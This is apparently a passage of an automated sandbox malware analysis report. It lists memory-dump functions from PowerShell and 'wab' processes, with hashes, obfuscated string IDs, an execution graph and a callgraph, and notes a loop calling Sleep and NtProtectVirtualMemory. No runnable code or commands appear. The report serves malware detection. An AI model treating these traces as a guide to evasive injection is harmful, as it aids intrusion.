                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                      • API String ID: 0-1608119003
                      • Opcode ID: 0dea1d144a1395d7e95384b70a26d28e083a652f29ba5a66db3b267edecd9031
                      • Instruction ID: 79f6564b837ca48232b47c7967151a50fd1f46a151ef9b83a30f3352fefa6727
                      • Opcode Fuzzy Hash: 0dea1d144a1395d7e95384b70a26d28e083a652f29ba5a66db3b267edecd9031
                      • Instruction Fuzzy Hash: B5F157B1B04216CFCB299B68940176ABBE6EFC5310F14847ADC65DB391DB31E845CBA2
                      Function 0715D0EA Relevance: 8.9, Strings: 7, Instructions: 198COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$tP^q$tP^q$$^q$(dq$(dq$(dq
                      • API String ID: 0-1710924510
                      • Opcode ID: 358d0349d3b9094550a62828df0719e09ccd21de75c98a915396fd406419e666
                      • Instruction ID: 39bbc411f4e9db8eb423faf14dd56ba544411c170ffe667af1dced73d9783029
                      • Opcode Fuzzy Hash: 358d0349d3b9094550a62828df0719e09ccd21de75c98a915396fd406419e666
                      • Instruction Fuzzy Hash: C171C5F0B00205DFCB2DCE54E5C5B6AB7E2AB85310F1A8495ECA5AB2E1C731DD81CB91
                      Function 07150470 Relevance: 6.5, Strings: 5, Instructions: 297COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q
                      • API String ID: 0-3457661241
                      • Opcode ID: ce53f10f6348711ae6c96e2a54a9a310dcfc6faf62ee27ee4a0a177aba1383ab
                      • Instruction ID: 7dc82579a69d194c06b009eff0f54f93afb5084bf613b5e43e627a7ec1d9b799
                      • Opcode Fuzzy Hash: ce53f10f6348711ae6c96e2a54a9a310dcfc6faf62ee27ee4a0a177aba1383ab
                      • Instruction Fuzzy Hash: A7A139B1B04355CFCB2D8BB8D81466ABBB2AF8A310F14C46BD965DB2D1DB31C844CB91
                      Function 07151D8B Relevance: 6.4, Strings: 5, Instructions: 120COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$tP^q$$^q$$^q$$^q
                      • API String ID: 0-3997570045
                      • Opcode ID: 89b13e4fcfcb57a991c729aa80b3f0ad07f10c8431f909c172961bcea2c59051
                      • Instruction ID: 2d18bc33303fdb5787c6fc4c9278cb1a377efb5b227db7cc99763aa8eb267e0a
                      • Opcode Fuzzy Hash: 89b13e4fcfcb57a991c729aa80b3f0ad07f10c8431f909c172961bcea2c59051
                      • Instruction Fuzzy Hash: 7741B1B0A0420DFFDB2F8E14C544BA5BBA2EB46610F1984AADD259F2D1C731D944DB91
                      Function 0715CBF5 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$$^q$$^q$$^q
                      • API String ID: 0-3272787073
                      • Opcode ID: fcd70deb8864e23cec306da6502b2235bc98ca2020a9105a6331e8940e80b1e7
                      • Instruction ID: f3b74d4d1e0ead953b6195955b8f486860f715a2a0bfadb824a2332ed14fc2a7
                      • Opcode Fuzzy Hash: fcd70deb8864e23cec306da6502b2235bc98ca2020a9105a6331e8940e80b1e7
                      • Instruction Fuzzy Hash: 2D315BB671430BCFCB2E4E6994505B6BBE59F86510B24846ACC65CA2C5CF35C445C7F1
                      Function 0715DB70 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: XRcq$XRcq$tP^q$$^q
                      • API String ID: 0-3596674671
                      • Opcode ID: a910114bbd01c124c6831e6bffc0244b231a4ce5ce3c014045622bfc6daaaccb
                      • Instruction ID: de97d75f8a305e0c10dd8f50e9e7b742f18ca8f5f213e0d648f4d8390a92f8ca
                      • Opcode Fuzzy Hash: a910114bbd01c124c6831e6bffc0244b231a4ce5ce3c014045622bfc6daaaccb
                      • Instruction Fuzzy Hash: 94416FB0B10209DBDB2DCF55E584AAABBF2AB85710F59C099DCA56B2D0C772DD40CB90
                      Function 07151400 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: $^q$$^q$$^q$$^q
                      • API String ID: 0-2125118731
                      • Opcode ID: 8373a2417e5915d913942fe42e69cc318c848ea7fdfa5f2549429faecf9d1e45
                      • Instruction ID: 77e50a23f7b74d54a1e33d85cdb5852e4b5231dab90c9271efc121b8a9903c20
                      • Opcode Fuzzy Hash: 8373a2417e5915d913942fe42e69cc318c848ea7fdfa5f2549429faecf9d1e45
                      • Instruction Fuzzy Hash: 032107B171020EEBDB3E596A8804B776ADA9BC1714F24882AAC16DB3C5EF75C841D261
                      Function 071584E8 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: $^q$$^q$$^q$$^q
                      • API String ID: 0-2125118731
                      • Opcode ID: 89db5d7e339a4f425603948fbfb8296fc191afd30eb044307a6adc11a1eb239c
                      • Instruction ID: 0fdae667111372ab1cc947b8f02146d17576382f17a867a0e66f16d6b335aab7
                      • Opcode Fuzzy Hash: 89db5d7e339a4f425603948fbfb8296fc191afd30eb044307a6adc11a1eb239c
                      • Instruction Fuzzy Hash: A91103F1A2031ACFDB3E9E69854067AB7F0AF81750F14417AEC258B285DB31D544CB92
                      Function 0715030B Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$$^q$$^q
                      • API String ID: 0-2049395529
                      • Opcode ID: 2263c922a81263c482429965d3fc43a8f0079621880755cee4b89b0bb778cbc9
                      • Instruction ID: e12fdd64178e09b572b1f9f1ebfb1dc0e4df6c6296fb3810bff73aa55cb338f3
                      • Opcode Fuzzy Hash: 2263c922a81263c482429965d3fc43a8f0079621880755cee4b89b0bb778cbc9
                      • Instruction Fuzzy Hash: 9801F2606093958FC36F12781C242152FB65FC7B1072A44DBC441DF3EBCE298D4A83A7

                      Execution Graph

                      Execution Coverage:1.2%
                      Dynamic/Decrypted Code Coverage:16.7%
                      Signature Coverage:100%
                      Total number of Nodes:6
                      Total number of Limit Nodes:1
                      execution_graph 341 24a82c70 LdrInitializeThunk 343 84aacd5 344 84aad16 343->344 345 84aa14b 343->345 344->343 346 84aad49 Sleep 344->346 347 84aad57 NtProtectVirtualMemory 344->347 346->343 347->344

                      Callgraph

                      • Executed
                      • Not Executed
                      • Opacity -> Relevance
                      • Disassembly available
                      callgraph 0 Function_24A13BA3 1 Function_24A14522 2 Function_24A1B4A7 3 Function_24A82FA0 4 Function_24A82EA0 5 Function_24A82BA0 6 Function_24A82CA0 7 Function_24A13BAC 8 Function_24A13BB1 9 Function_24A13C31 10 Function_24A1B4B2 11 Function_24A1ACB5 12 Function_24A1AB36 13 Function_24A839B0 14 Function_24A82FB0 15 Function_24A82DB0 16 Function_24A82AB0 17 Function_24A82D30 18 Function_24A82E30 19 Function_24A82F30 20 Function_24A19939 21 Function_24A1203B 22 Function_24A1283D 23 Function_24A18FBF 24 Function_084AACD5 42 Function_084AA58B 24->42 25 Function_24A19B80 26 Function_24A13F00 27 Function_24A85080 28 Function_24A82E80 29 Function_24A82B80 30 Function_24A82C00 31 Function_24A82D00 32 Function_24A1B008 33 Function_24A12011 34 Function_24A1AF15 35 Function_24A83090 36 Function_24A82F90 37 Function_24A82D10 38 Function_24A83010 39 Function_24A83D10 40 Function_24A19919 41 Function_24A12860 43 Function_24A1AAE5 44 Function_24A82BE0 45 Function_24A82EE0 46 Function_24A82FE0 47 Function_24A82F60 48 Function_24A82B60 49 Function_24A82C60 50 Function_24A11FEC 51 Function_24A19973 52 Function_24A1AFF7 53 Function_24A11DF9 54 Function_24A82DF0 55 Function_24A82C70 56 Function_24A82AF0 57 Function_24A82BF0 58 Function_24A82CF0 59 Function_24A83D70 60 Function_24A1977B 61 Function_24A127FA 62 Function_24A13BFA 63 Function_24A1B6FC 64 Function_24A13F40 65 Function_24A835C0 66 Function_24A82CC0 67 Function_24A84340 68 Function_24A1B14A 69 Function_24A13BCF 70 Function_24A11FD2 71 Function_24A13FD2 72 Function_24A13FD5 73 Function_24A1AAD5 74 Function_24A1B3D5 75 Function_24A13BD4 76 Function_24A11FD7 77 Function_24A82AD0 78 Function_24A82DD0 79 Function_24A13BD9 80 Function_24A84650 81 Function_24A11FDC 82 Function_24A1B1DC 83 Function_24A1225F 84 Function_24A13BDE

                      Executed Functions

                      Function 084AACD5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • Sleep.KERNELBASE(00000005), ref: 084AAD4E
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2397685351.00000000083AA000.00000040.00000400.00020000.00000000.sdmp, Offset: 083AA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_83aa000_wab.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID: @6:0
                      • API String ID: 3472027048-2579951830
                      • Opcode ID: 4c8020f387d91ec1b26a3dfcea4d67f2e47bc66b66908ca5e61a6c98454e2c61
                      • Instruction ID: 7e7afaf026950c2f97188a14643c14365118a0a484926ffc5fcaca103df1de53
                      • Opcode Fuzzy Hash: 4c8020f387d91ec1b26a3dfcea4d67f2e47bc66b66908ca5e61a6c98454e2c61
                      • Instruction Fuzzy Hash: BE319C76504311AFE7049A34CD8EB967366EF223A6F55875DED928F0F2D364C842CA11
                      Function 24A82DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 21 24a82df0-24a82dfc LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: f26b145e5be1ba2dfe47f3bf50cb41d5871cbeefcf230c7281bfc49c975ccd45
                      • Instruction ID: fcd62e11b3f9ba637a78bb36e90608940177e208235aa6d2a102c1dc05bbfcef
                      • Opcode Fuzzy Hash: f26b145e5be1ba2dfe47f3bf50cb41d5871cbeefcf230c7281bfc49c975ccd45
                      • Instruction Fuzzy Hash: CF90023121540413D1117158454470710995BD0245FD6C416A0429558D9656CA52A125
                      Function 24A82C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 20 24a82c70-24a82c7c LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: ae193cf4022d27da7aeaac18e0dc8af48504c2107a42063647d970e6c12a2bd0
                      • Instruction ID: 186bca9780620f297de7ec61c0fc32b13805ade033add692267a2b69a385e68e
                      • Opcode Fuzzy Hash: ae193cf4022d27da7aeaac18e0dc8af48504c2107a42063647d970e6c12a2bd0
                      • Instruction Fuzzy Hash: DC90023121548802D1107158844474A10955BD0305F9AC415A4429658D8695C9917125
                      Function 24A835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 22 24a835c0-24a835cc LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: e0974ed2d501e81f91c4f56fd8e8ce8d08661099630c4e8d9f88fccbe4ca18bc
                      • Instruction ID: 7a0c4585e22b038103b3fa16487cf10d762ec829b3cdd2f567dc30ef1240e18c
                      • Opcode Fuzzy Hash: e0974ed2d501e81f91c4f56fd8e8ce8d08661099630c4e8d9f88fccbe4ca18bc
                      • Instruction Fuzzy Hash: DA90023161950402D1007158455470620955BD0205FA6C415A0429568D8795CA5165A6

                      Non-executed Functions

                      Function 08C31AC6 Relevance: .2, Instructions: 194COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000003.2366014845.0000000008C30000.00000004.00000020.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_3_8c30000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 88aa77377ff5d8812ebefde2d9558e73e29ab3716a22f7c98e85eba79b5ba34a
                      • Instruction ID: c03744889025007189bc291b0fe17707af7abb88aabaa8bda0415259990f6763
                      • Opcode Fuzzy Hash: 88aa77377ff5d8812ebefde2d9558e73e29ab3716a22f7c98e85eba79b5ba34a
                      • Instruction Fuzzy Hash: 0A5105B28492D29FC3468F74D8925D2BFF0EE2332432D45DAD4C08A153F3259657DBA5
                      Function 24A82BA0 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ef1db4cfa6139cbecaff46e9503f4b3678e7db541c0ec4680bbf671df84f0d1d
                      • Instruction ID: 13bbe27e04fe66003355e85ff49555c8b46c75d1b0ba5bbf7e32116b079f65e6
                      • Opcode Fuzzy Hash: ef1db4cfa6139cbecaff46e9503f4b3678e7db541c0ec4680bbf671df84f0d1d
                      • Instruction Fuzzy Hash: 7A90023161940802D1507158445474610955BD0305F96C015A0029654D8755CB5576A5
                      Function 24A82CA0 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ecf3addfa6843ac635b672c44004f78ce2a8dbcf68b160762ef2d46206e64e96
                      • Instruction ID: 75b15ea05eef94f7155d9598fde9e3bac05c86326f1399eaa4ead50bd7e2ca2c
                      • Opcode Fuzzy Hash: ecf3addfa6843ac635b672c44004f78ce2a8dbcf68b160762ef2d46206e64e96
                      • Instruction Fuzzy Hash: CE90023121540402D1007598544864610955BE0305F96D015A5029555EC665C9916135
                      Function 24A82EA0 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ba86fb9a1c830508d35a06794ca23d505df67e381cdaa9115d193eac6cd78efb
                      • Instruction ID: 8e36d7faf3a172ea0a957373ed545616f157916114b387eecccd26e7d7038dac
                      • Opcode Fuzzy Hash: ba86fb9a1c830508d35a06794ca23d505df67e381cdaa9115d193eac6cd78efb
                      • Instruction Fuzzy Hash: 7090027121540402D1407158444474610955BD0305F96C015A5069554E8659CED56669
                      Function 24A82FA0 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 25a76e240975934b8b7fb9df726cc4cb28faae977ef1948cdf45e5e76b1a86f7
                      • Instruction ID: c25900ab05816f20f323cd24bdba29fc4d9be635b9038e5553b0ee8313d17ae2
                      • Opcode Fuzzy Hash: 25a76e240975934b8b7fb9df726cc4cb28faae977ef1948cdf45e5e76b1a86f7
                      • Instruction Fuzzy Hash: 5F90023121580402D1007158484874710955BD0306F96C015A5169555E8665C9916535
                      Function 24A839B0 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d0c144dbe8a251498f0319e8277c941ef456058e7052656b377562de6d4adcab
                      • Instruction ID: 7706e3eddac33b23284840abbdfc312dc4c546ef155956698900e26535e8589d
                      • Opcode Fuzzy Hash: d0c144dbe8a251498f0319e8277c941ef456058e7052656b377562de6d4adcab
                      • Instruction Fuzzy Hash: 3C90023125945102D150715C444461650957BE0205F96C025A0819594D8555C9556225
                      Function 24A82FB0 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6b0392b3e71566aa827b9d587125838a90bb7f2884db9b920ee9432ef5490a47
                      • Instruction ID: f609ac4330204384d832424339eeb9b7abc5b171567efaa50e797ad0b0d07fef
                      • Opcode Fuzzy Hash: 6b0392b3e71566aa827b9d587125838a90bb7f2884db9b920ee9432ef5490a47
                      • Instruction Fuzzy Hash: B19002316154004241407168888490650957FE1215796C125A099D550D8559C9655669
                      Function 24A82DB0 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7f6ac8588758ae8b014d9bdfa22e58f74ad25b3466b3ad5fa1b1649e0850757e
                      • Instruction ID: 157f3538122e1aa4bf9ba1f03c9227e2abae1f69873f9c623c9a204cc024c63e
                      • Opcode Fuzzy Hash: 7f6ac8588758ae8b014d9bdfa22e58f74ad25b3466b3ad5fa1b1649e0850757e
                      • Instruction Fuzzy Hash: B790023125540402D1417158444460610996BD0245FD6C016A0429554E8655CB56AA65
                      Function 24A82AB0 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d328b733f42689e8346bdf38e9be7e3b87b0135d98558ae800cdd057b2320fc0
                      • Instruction ID: 573c15cab3401f8bf851b429fd744a2a6f6dd92102548d12d4af3143f488c932
                      • Opcode Fuzzy Hash: d328b733f42689e8346bdf38e9be7e3b87b0135d98558ae800cdd057b2320fc0
                      • Instruction Fuzzy Hash: 759002B1215540924500B2588444B0A55955BE0205B96C01AE1059560CC525C9519139
                      Function 24A82D30 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4d1e06e866632e16c22d0a7729a562e78cc68fd7a72cb65bf2bf9597722c13d5
                      • Instruction ID: 94f8faf38a268e6ea0eacfbc8164771632e9468d7cb3cd87bcca6f7371aa99dc
                      • Opcode Fuzzy Hash: 4d1e06e866632e16c22d0a7729a562e78cc68fd7a72cb65bf2bf9597722c13d5
                      • Instruction Fuzzy Hash: 2C90023131540003D140715854586065095ABE1305F96D015E0419554CD915C9565226
                      Function 24A82E30 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b1466519b7662df428d62e2aaf74625cec6ff146ce0577c6883360ee9acd5536
                      • Instruction ID: fc8066f51784909125ad71396dc8f2c05cd11e65f93b44b953565dfec0d5379b
                      • Opcode Fuzzy Hash: b1466519b7662df428d62e2aaf74625cec6ff146ce0577c6883360ee9acd5536
                      • Instruction Fuzzy Hash: B290023131540402D1027158445460610999BD1349FD6C016E1429555D8625CA53A136
                      Function 24A82F30 Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 52cd4c90ac9367a9b68d85d98977d2475f8ce225093f17e99a2a92702f9b60e0
                      • Instruction ID: 1cd72f4f17bdb5b040d9256357a55ffc2f692370d6701859c6b3e4c63967ddef
                      • Opcode Fuzzy Hash: 52cd4c90ac9367a9b68d85d98977d2475f8ce225093f17e99a2a92702f9b60e0
